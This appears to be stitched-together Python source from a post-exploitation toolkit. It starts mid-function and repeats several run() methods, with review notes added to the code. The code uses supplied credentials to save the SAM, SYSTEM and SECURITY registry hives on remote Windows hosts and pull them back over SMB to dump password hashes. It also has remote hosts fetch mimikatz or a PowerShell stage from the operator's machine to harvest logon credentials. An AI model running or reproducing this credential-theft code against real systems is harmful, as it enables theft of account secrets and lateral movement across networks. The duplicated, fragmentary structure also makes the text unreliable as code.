            # host mimikatz.exe and trigger it ONLY on this particular machine
            # so we can get the architecture correct
            delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs)
            print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
            time.sleep(int(delay))
            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)
            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            # save the file off to the appropriate location
            # NOTE(review): called unconditionally, so an empty mimikatz.txt is written on failure
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
            if out != "":
                self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
    # cross-target summaries: each list de-duplicated and sorted before printing
    if len(allhashes) > 0:
        allhashes = sorted(set(allhashes))
        self.output += "[*] All unique hashes:\n\t" + "\n\t".join( allhashes) + "\n"
    if len(allmsv) > 0:
        allmsv = sorted(set(allmsv))
        self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
    if len(allkerberos) > 0:
        allkerberos = sorted(set(allkerberos))
        self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n"
    if len(allwdigest) > 0:
        allwdigest = sorted(set(allwdigest))
        self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n"
    if len(alltspkg) > 0:
        alltspkg = sorted(set(alltspkg))
        self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
    """
    Collect credential material from each target, choosing a PowerShell or a binary path per host.

    Uses the single credential pair in self.creds[0]. Options: "lhost" and
    "use_ssl" for the hosting side, "force_method" ("binary", "powershell",
    or anything else to probe for a working PowerShell), "delay" (a string,
    converted with int()) and "out_file" (prefixed with the Windows temp
    directory when it contains no backslash).

    PowerShell path: stages data/misc/autograb.ps1 via powershellHostTrigger,
    fetches out_file and parses it with helpers.parseMimikatz and
    helpers.parseHashdump. Binary path: saves the SYSTEM/SECURITY/SAM hives
    with reg.exe, copies them to fixed /tmp paths on this host, runs
    creddump.dump_file_hashes on them, then hosts the architecture-matching
    mimikatz binary via hostTrigger and parses its output.

    Per-target status lines and a sorted, de-duplicated cross-target summary
    of every list are appended to self.output. Returns nothing.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    lhost = self.required_options["lhost"][0]
    use_ssl = self.required_options["use_ssl"][0]
    force_method = self.required_options["force_method"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]
    # let's keep track of all credentials found (accumulated across targets)
    allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
    for target in self.targets:
        powershellInstalled = False
        # check if we're forcing a particular grab method
        if force_method.lower() == "binary":
            powershellInstalled = False
        elif force_method.lower() == "powershell":
            powershellInstalled = True
        else:
            # check if we have a functional Powershell installation by echoing a constant
            powershellCommand = 'powershell.exe -c "$a=42;$a"'
            powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
            if powershellResult.strip() == "42":
                powershellInstalled = True
        if powershellInstalled:
            # do powersploit combined file of invoke-mimikatz and powerdump
            print helpers.color("\n [*] Powershell installed on " + target)
            self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
            # the temporary output file we will write to; once prefixed it contains a
            # backslash, so later iterations don't prefix it again
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file
            # path to the combined Invoke-Mimikatz/powerdump powershell script
            secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
            # trigger the powershell download on just this target (trigger method pinned to winexe)
            delivery_methods.powershellHostTrigger(
                target,
                username,
                password,
                secondStagePath,
                lhost,
                "",
                triggerMethod="winexe",
                outFile=out_file,
                ssl=use_ssl,
                noArch=True,
            )
            # delay is a string here; int() below raises ValueError on a non-numeric value
            print "\n [*] Waiting " + delay + "s for Autograb to run..."
            time.sleep(int(delay))
            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)
            # save the file off to the appropriate location
            # NOTE(review): saved and parsed before the out != "" check, so an empty
            # autograb.txt is written on failure
            saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)
            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            # parse the powerdump component
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)
            if out != "":
                # NOTE(review): username:password lands in self.output in cleartext
                self.output += (
                    "[*] Autograb.ps1 results using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " stored at "
                    + saveFile
                    + "\n"
                )
            else:
                self.output += (
                    "[!] Autograb.ps1 failed using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " : no result file\n"
                )
        else:
            # do reg.exe for hashdump and host/execute for mimikatz
            print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
            print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
            self.output += "[!] Powershell not installed on " + target + "\n"
            # reg.exe command to save off the hives
            regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
            # execute the registry save command
            command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
            print helpers.color("\n [*] Dumping hashes on " + target)
            # sleep for 5 seconds to let everything backup (fixed wait)
            time.sleep(5)
            # grab all of the backed up files; delete=False, so the hive copies stay on the target
            systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
            securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
            samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
            # more error-checking here?
            # NOTE(review): these messages interpolate the (empty) file CONTENTS
            # where a file name was intended, so they always print "File ''"
            # NOTE(review): the hive copies go to fixed, predictable paths in the
            # shared /tmp directory and are never removed; on a multi-user host that
            # is a symlink / pre-creation risk and leaves credential material behind —
            # tempfile.mkdtemp() plus cleanup would avoid both
            if systemFile == "":
                self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open("/tmp/system", "w")
                f.write(systemFile)
                f.close()
            if securityFile == "":
                self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open("/tmp/security", "w")
                f.write(securityFile)
                f.close()
            if samFile == "":
                self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open("/tmp/sam", "w")
                f.write(samFile)
                f.close()
            # get all the hashes from these hives
            # NOTE(review): runs even when a fetch above failed, so a stale /tmp copy
            # from an earlier target/run can be attributed to this target; the
            # hashdump module guards this with an "error" flag — do the same here
            out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
            # save the output file off
            saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
            self.output += (
                "[*] dumped hashes (reg.exe) using creds '"
                + username
                + ":"
                + password
                + "' on "
                + target
                + " saved to "
                + saveLocation
                + "\n"
            )
            # save these off to the universal list
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)
            # now, detect the architecture
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
            # anything without "64" in it (including an empty result) is treated as x86
            arch = "x86"
            if "64" in archResult:
                arch = "x64"
            # now time for ze mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
            # the temporary output file we will write to
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file
            exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file
            # host mimikatz.exe and trigger it ONLY on this particular machine
            # so we can get the architecture correct
            delivery_methods.hostTrigger(
                target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
            )
            print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
            time.sleep(int(delay))
            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)
            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            # save the file off to the appropriate location
            # NOTE(review): called unconditionally, so an empty mimikatz.txt is written on failure
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
            if out != "":
                self.output += (
                    "[*] Mimikatz results using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " stored at "
                    + saveFile
                    + "\n"
                )
            else:
                self.output += (
                    "[!] Mimikatz failed using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " : no result file\n"
                )
    # cross-target summaries: each list de-duplicated and sorted before printing
    if len(allhashes) > 0:
        allhashes = sorted(set(allhashes))
        self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
    if len(allmsv) > 0:
        allmsv = sorted(set(allmsv))
        self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
    if len(allkerberos) > 0:
        allkerberos = sorted(set(allkerberos))
        self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
    if len(allwdigest) > 0:
        allwdigest = sorted(set(allwdigest))
        self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
    if len(alltspkg) > 0:
        alltspkg = sorted(set(alltspkg))
        self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
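def run(self):
    """Dump local account hashes from every target via reg.exe hive backups.

    Uses the first credential pair in self.creds to run ``reg save`` for the
    SYSTEM, SECURITY and SAM hives into C:\\Windows\\Temp on each host in
    self.targets, pulls the backups back over SMB, hands SYSTEM + SAM to
    creddump.dump_file_hashes and appends per-target and aggregate results
    to self.output (one "hashes.txt" per target via helpers.saveModuleFile).

    Reads: self.creds, self.required_options["trigger_method"], self.targets.
    Writes: self.output (note: the operator password is echoed into it).
    """
    # stdlib only; imported locally so this module stays self-contained
    import os
    import shutil
    import tempfile

    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    # remote backup locations; also used verbatim in error messages so the
    # operator sees which path failed (the original printed the empty
    # file contents instead of the path)
    remoteHives = {
        "system": "C:\\Windows\\Temp\\system",
        "security": "C:\\Windows\\Temp\\security",
        "sam": "C:\\Windows\\Temp\\sam",
    }

    # reg.exe command to save off the hives
    regSaveCommand = (
        "reg save HKLM\\SYSTEM " + remoteHives["system"] + " /y && "
        "reg save HKLM\\SECURITY " + remoteHives["security"] + " /y && "
        "reg save HKLM\\SAM " + remoteHives["sam"] + " /y"
    )

    # let's keep track of ALL hashes found (one creddump result per target)
    allHashes = []

    for target in self.targets:
        print(helpers.color("\n [*] Dumping hashes on " + target))

        # execute the registry save command
        command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)

        # sleep for 5 seconds to let everything backup
        time.sleep(5)

        # grab all of the backed up files. The backups are raw credential
        # material, so delete them from the target once retrieved instead
        # of leaving SAM/SYSTEM/SECURITY copies behind in C:\Windows\Temp.
        hiveData = {}
        for hive, remotePath in remoteHives.items():
            hiveData[hive] = smb.getFile(target, username, password, remotePath, delete=True)
            if not hiveData[hive]:
                self.output += "[!] File '" + remotePath + "' from " + target + " empty or doesn't exist\n"

        # creddump needs SYSTEM (bootkey) and SAM; SECURITY is not required
        if not (hiveData["system"] and hiveData["sam"]):
            self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "' on " + target + "\n"
            continue

        # stage the hives in a private (0700) temp directory rather than the
        # fixed, predictable /tmp/{system,sam} paths that any local user could
        # read or pre-create, and remove the copies when done
        stageDir = tempfile.mkdtemp(prefix="pillage-hashdump-")
        try:
            systemPath = os.path.join(stageDir, "system")
            samPath = os.path.join(stageDir, "sam")
            with open(systemPath, "wb") as f:
                f.write(hiveData["system"])
            with open(samPath, "wb") as f:
                f.write(hiveData["sam"])

            # get all the hashes from these hives
            hashes = creddump.dump_file_hashes(systemPath, samPath)
        finally:
            shutil.rmtree(stageDir, ignore_errors=True)

        # add the hashes to our global list
        allHashes.append(hashes)

        # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
        saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)
        self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

    # get all non-empty hashes, uniquify and sort them; joining with "\n"
    # keeps the last line of one target from fusing with the first of the next
    uniqueHashes = sorted(set(
        line.lower() for line in "\n".join(allHashes).split("\n") if line != ""
    ))
    if uniqueHashes:
        self.output += "[*] All unique hashes:\n" + "\n".join(uniqueHashes) + "\n"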
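def run(self):
    """Run the architecture-matched Mimikatz binary on each target.

    For every host in self.targets: detect PROCESSOR_ARCHITECTURE through the
    configured trigger method, host and trigger mimikatz{x86,x64}.exe from
    VEIL_PILLAGE_PATH/data/misc with ``sekurlsa::logonPasswords full``
    redirected to out_file, wait ``delay`` seconds, fetch (and delete) the
    output over SMB, parse it with helpers.parseMimikatz and record
    per-target and aggregate credentials in self.output.

    Reads: self.creds[0]; required_options trigger_method, lhost, delay,
    out_file; self.targets.
    Writes: self.output (note: the operator password is echoed into it) and
    one "mimikatz.txt" per successful target via helpers.saveModuleFile.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    lhost = self.required_options["lhost"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]

    # validate the delay before anything is executed on a target, so a bad
    # option fails here rather than after mimikatz has already been triggered
    delaySeconds = int(delay)

    # the temporary output file mimikatz will write to
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file

    # let's keep track of ALL plaintext credentials found
    allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []

    for target in self.targets:
        print("\n [*] Executing mimikatz on " + target)

        # first, detect the architecture
        archCommand = "echo %PROCESSOR_ARCHITECTURE%"
        archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod)

        # if there's a failure in this initial execution, go to the next target
        if "error" in archResult:
            self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
            continue

        # anything reporting "64" (AMD64/IA64/ARM64) gets the x64 build
        arch = "x64" if "64" in archResult else "x86"

        exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

        # now time for mimikatz!
        mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

        # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
        delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)

        print("\n [*] Waiting " + delay + "s for Mimikatz to run...")
        time.sleep(delaySeconds)

        # grab the output file and delete it from the target
        out = smb.getFile(target, username, password, out_file, delete=True)

        if not out:
            # nothing came back: don't parse it or write an empty mimikatz.txt
            self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
            continue

        # parse the mimikatz output and append it to our globals
        (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
        allmsv.extend(msv1_0)
        allkerberos.extend(kerberos)
        allwdigest.extend(wdigest)
        alltspkg.extend(tspkg)

        # save the file off to the appropriate location
        saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
        self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"

    # append the total mimikatz creds if we have any
    for label, creds in (("msv1_0", allmsv), ("kerberos", allkerberos), ("wdigest", allwdigest), ("tspkg", alltspkg)):
        if creds:
            self.output += "[*] All " + label + ":\n\t" + "\n\t".join(sorted(set(creds))) + "\n"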
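def run(self):
    """Run the architecture-matched Mimikatz binary on each target.

    For every host in self.targets: detect PROCESSOR_ARCHITECTURE through the
    configured trigger method, host and trigger mimikatz{x86,x64}.exe from
    VEIL_PILLAGE_PATH/data/misc with ``sekurlsa::logonPasswords full``
    redirected to out_file, wait ``delay`` seconds, fetch (and delete) the
    output over SMB, parse it with helpers.parseMimikatz and record
    per-target and aggregate credentials in self.output.

    Reads: self.creds[0]; required_options trigger_method, lhost, delay,
    out_file; self.targets.
    Writes: self.output (note: the operator password is echoed into it) and
    one "mimikatz.txt" per successful target via helpers.saveModuleFile.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    lhost = self.required_options["lhost"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]

    # validate the delay before anything is executed on a target, so a bad
    # option fails here rather than after mimikatz has already been triggered
    delaySeconds = int(delay)

    # the temporary output file mimikatz will write to
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file

    # let's keep track of ALL plaintext credentials found
    allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []

    for target in self.targets:
        print("\n [*] Executing mimikatz on " + target)

        # first, detect the architecture
        archCommand = "echo %PROCESSOR_ARCHITECTURE%"
        archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod)

        # if there's a failure in this initial execution, go to the next target
        if "error" in archResult:
            self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n"
            continue

        # anything reporting "64" (AMD64/IA64/ARM64) gets the x64 build
        arch = "x64" if "64" in archResult else "x86"

        exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

        # now time for mimikatz!
        mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

        # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
        delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)

        print("\n [*] Waiting " + delay + "s for Mimikatz to run...")
        time.sleep(delaySeconds)

        # grab the output file and delete it from the target
        out = smb.getFile(target, username, password, out_file, delete=True)

        if not out:
            # nothing came back: don't parse it or write an empty mimikatz.txt
            self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
            continue

        # parse the mimikatz output and append it to our globals
        (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
        allmsv.extend(msv1_0)
        allkerberos.extend(kerberos)
        allwdigest.extend(wdigest)
        alltspkg.extend(tspkg)

        # save the file off to the appropriate location
        saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
        self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"

    # append the total mimikatz creds if we have any
    for label, creds in (("msv1_0", allmsv), ("kerberos", allkerberos), ("wdigest", allwdigest), ("tspkg", alltspkg)):
        if creds:
            self.output += "[*] All " + label + ":\n\t" + "\n\t".join(sorted(set(creds))) + "\n"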
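def run(self):
    """Dump local account hashes from every target via reg.exe hive backups.

    Uses the first credential pair in self.creds to run ``reg save`` for the
    SYSTEM, SECURITY and SAM hives into C:\\Windows\\Temp on each host in
    self.targets, pulls the backups back over SMB, hands SYSTEM + SAM to
    creddump.dump_file_hashes and appends per-target and aggregate results
    to self.output (one "hashes.txt" per target via helpers.saveModuleFile).

    Reads: self.creds, self.required_options["trigger_method"], self.targets.
    Writes: self.output (note: the operator password is echoed into it).
    """
    # stdlib only; imported locally so this module stays self-contained
    import os
    import shutil
    import tempfile

    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    # remote backup locations; also used verbatim in error messages so the
    # operator sees which path failed (the original printed the empty
    # file contents instead of the path)
    remoteHives = {
        "system": "C:\\Windows\\Temp\\system",
        "security": "C:\\Windows\\Temp\\security",
        "sam": "C:\\Windows\\Temp\\sam",
    }

    # reg.exe command to save off the hives
    regSaveCommand = (
        "reg save HKLM\\SYSTEM " + remoteHives["system"] + " /y && "
        "reg save HKLM\\SECURITY " + remoteHives["security"] + " /y && "
        "reg save HKLM\\SAM " + remoteHives["sam"] + " /y"
    )

    # let's keep track of ALL hashes found (one creddump result per target)
    allHashes = []

    for target in self.targets:
        print(helpers.color("\n [*] Dumping hashes on " + target))

        # execute the registry save command
        command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)

        # sleep for 5 seconds to let everything backup
        time.sleep(5)

        # grab all of the backed up files. The backups are raw credential
        # material, so delete them from the target once retrieved instead
        # of leaving SAM/SYSTEM/SECURITY copies behind in C:\Windows\Temp.
        hiveData = {}
        for hive, remotePath in remoteHives.items():
            hiveData[hive] = smb.getFile(target, username, password, remotePath, delete=True)
            if not hiveData[hive]:
                self.output += "[!] File '" + remotePath + "' from " + target + " empty or doesn't exist\n"

        # creddump needs SYSTEM (bootkey) and SAM; SECURITY is not required
        if not (hiveData["system"] and hiveData["sam"]):
            self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "' on " + target + "\n"
            continue

        # stage the hives in a private (0700) temp directory rather than the
        # fixed, predictable /tmp/{system,sam} paths that any local user could
        # read or pre-create, and remove the copies when done
        stageDir = tempfile.mkdtemp(prefix="pillage-hashdump-")
        try:
            systemPath = os.path.join(stageDir, "system")
            samPath = os.path.join(stageDir, "sam")
            with open(systemPath, "wb") as f:
                f.write(hiveData["system"])
            with open(samPath, "wb") as f:
                f.write(hiveData["sam"])

            # get all the hashes from these hives
            hashes = creddump.dump_file_hashes(systemPath, samPath)
        finally:
            shutil.rmtree(stageDir, ignore_errors=True)

        # add the hashes to our global list
        allHashes.append(hashes)

        # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
        saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)
        self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

    # get all non-empty hashes, uniquify and sort them; joining with "\n"
    # keeps the last line of one target from fusing with the first of the next
    uniqueHashes = sorted(set(
        line.lower() for line in "\n".join(allHashes).split("\n") if line != ""
    ))
    if uniqueHashes:
        self.output += "[*] All unique hashes:\n" + "\n".join(uniqueHashes) + "\n"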